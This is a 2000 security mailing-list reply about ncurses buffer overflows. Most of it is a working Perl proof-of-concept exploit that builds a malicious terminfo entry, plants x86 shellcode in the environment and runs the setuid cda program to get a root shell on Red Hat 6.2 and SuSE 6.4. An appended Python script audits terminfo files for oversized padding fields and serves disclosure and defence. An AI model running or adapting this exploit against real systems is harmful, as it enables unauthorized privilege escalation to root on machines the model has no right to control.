Re: ncurses buffer overflows (fwd)
From: Jouko Pynnönen
Subject: Re: ncurses buffer overflows (fwd)
Date: Mon, 2 Oct 2000 19:00:52 +0300 (EEST)
On Mon, 2 Oct 2000, Thomas E. Dickey wrote:
> I'd like to see the exploit: there are too many perhaps/maybes in this
This is a demonstration script I sent to Linux people on
address@hidden; it works straight on rh-6.2 and SuSE-6.4, other platforms
may need fiddling with the number values...
Jouko
------------------------------------------------------------------------------
#!/usr/bin/perl
#
# Proof of concept exploit for ncurses and cda,
# gives root on SuSE and RedHat.
# (c) 2000 Jouko Pynnonen
# This was written for vendors for informational purposes -
# do not distribute.
#
# Type stty sane <ctrl-j> when the shell starts to get keyboard echo back.
$offset=shift;
$buflen=shift;
$align=shift;
if (!$offset) { $offset=0; }
if (!$buflen) { $buflen=500; }
if (!$align) { $align=0; }
# create the evil terminfo file
$addr1=pack("L",0xbfffff10+$offset);
($b1,$b2,$b3,$b4)=unpack("C4",$addr1);
open(A,">infofile") || die("Can't write infofile");
print A "
evilterm,
am, bce, eo, mir, msgr, xenl, xon,
cols#80, it#8, lines#25,";
$addr="%{$b4}%{$b3}%{$b2}%{$b1}%c%c%c%c";
$prepad='x' x $align;
$postpad='y' x (4-$align);
print A "cup=$prepad%0".$buflen."d".($addr x 30).($bddr x
$addrlen)."$postpad,\n";
close A;
# compile it
system("tic infofile -o ~/.terminfo 2>/dev/null");
# stabilize env
foreach $e (keys %ENV) {
delete $ENV{$e} unless $e eq 'HOME';
}
$ENV{"PATH"}="/bin:/usr/bin:/usr/X11R6/bin";
$ENV{"TERM"}="evilterm";
$ENV{"TERMINFO_DIRS"}="$ENV{'HOME'}/.terminfo:/usr/share/terminfo";
$ENV{"SHELLCODE"}=("\x90" x 200).
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89".
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89".
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/tmp/sh";
if (! -f "/tmp/sh") {
if (-f "/bin/ash") { system("cp -f /bin/ash /tmp/sh"); }
else { system("cp -f /bin/sh /tmp"); }
}
system("mkdir -p tmp/config;touch tmp/config/common.cfg tmp/config/null");
$ENV{"XMCD_LIBDIR"}="tmp";
$st=system("cda -dev /dev/null visual");
if ($st != 0) { print "exit status: $st\n"; }
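An added audit script, not part of this thread, that estimates how far tparm() would expand each string capability in a terminfo source file and flags conversions with oversized field widths such as the %0500d padding the script above builds into cup; the MAX_FIELD_WIDTH value and the sample entries are constructed assumptions.

```python
import re
# Width above which a %d/%o/%x/%X/%s conversion is flagged. Assumed value for
# this example; set it to the tparm() output buffer of the ncurses build audited.
MAX_FIELD_WIDTH = 80

# One tparm() token: a formatted conversion (group 1 = width digits), another
# %-operator, an escape sequence, or a literal byte.
TOKEN_RE = re.compile(
    r"%:?[-+# ]*(\d*)(?:\.\d+)?[doxXs]"   # formatted output: at least width bytes
    r"|%'.'|%\{\d+\}|%p\d|%P.|%g.|%."      # stack ops; only %% and %c emit a byte
    r"|\\\d{3}|\\.|\^.|.")                 # escapes and literals: one byte each

def max_expansion(value):
    """Return (bytes, widest_field): lower bound on tparm() output for value."""
    total, widest = 0, 0
    for m in TOKEN_RE.finditer(value):
        tok = m.group(0)
        if m.group(1) is not None:          # %[flags][width]d and friends
            width = int(m.group(1) or 0)
            widest = max(widest, width)
            total += max(width, 1)
        elif tok.startswith("%"):
            total += 1 if tok in ("%%", "%c") else 0
        else:
            total += 1                      # a %s field may emit more than counted
    return total, widest

def string_caps(entry):
    """Yield (name, value) string capabilities; '\\,' is an escaped comma."""
    for field in re.split(r"(?<!\\),", entry)[1:]:
        if "=" in field:
            name, value = field.strip().split("=", 1)
            yield name, value.replace("\\,", ",")

def audit(source):
    """Return (term, cap, bytes) for caps whose widest field exceeds the limit.
    Entries begin at column 0; continuation lines are indented."""
    findings = []
    for entry in re.split(r"\n(?![ \t])", source):
        if not entry.strip() or entry.startswith("#"):
            continue
        term = entry.split(",", 1)[0].split("|")[0]
        for name, value in string_caps(entry):
            total, widest = max_expansion(value)
            if widest > MAX_FIELD_WIDTH:
                findings.append((term, name, total))
    return findings

# Constructed sample: a benign cup string and one shaped like the evilterm entry.
SAMPLE = ("goodterm|constructed benign entry,\n\tcols#80, lines#25,\n"
          "\tcup=\\E[%i%p1%d;%p2%dH,\nevilterm,\n\tam, xenl, cols#80,\n"
          "\tlines#25, cup=xx%0500dABCDABCDyy,\n")
```

Running audit(SAMPLE) reports only the evilterm cup string, which a setuid program reading a user-supplied TERMINFO_DIRS entry would otherwise expand unchecked.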